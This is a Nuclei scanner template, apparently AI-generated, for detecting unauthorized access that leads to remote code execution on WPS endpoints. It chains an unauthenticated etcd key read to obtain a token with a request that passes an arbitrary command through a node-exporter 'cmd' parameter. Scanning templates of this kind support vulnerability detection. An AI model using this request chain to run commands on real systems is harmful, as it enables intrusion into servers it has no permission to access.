flow: |
    http(1) && http(2)
http:
    - extractors:
        - internal: true
          json:
            - .token
          name: token
          type: json
      id: check-unauthorized-access
      matchers:
        - status:
            - 200
          type: status
        - part: body
          type: word
          words:
            - config/storage
      method: GET
      path:
        - '{{BaseURL}}/open/v6/api/etcd/operate?key=/config/storage&method=get'
    - headers:
        Authorization: Bearer {{token}}
      id: execute-command
      matchers:
        - status:
            - 200
          type: status
        - part: body
          type: word
          words:
            - success
      matchers-condition: and
      method: GET
      path:
        - '{{BaseURL}}/open/wps/run/{{namespace}}/{{podname}}/node-exporter?cmd={{url_encode(command_to_execute)}}'
id: wps-unauthorized-rce
info:
    author: ProjectDiscoveryAI
    description: |
        This template checks for unauthorized access on WPS endpoints that could potentially lead to remote code execution (RCE).
    name: WPS Unauthorized Access Leading to RCE
    severity: critical
    tags:
        - unauthorized
        - wps
        - Node-Exporter
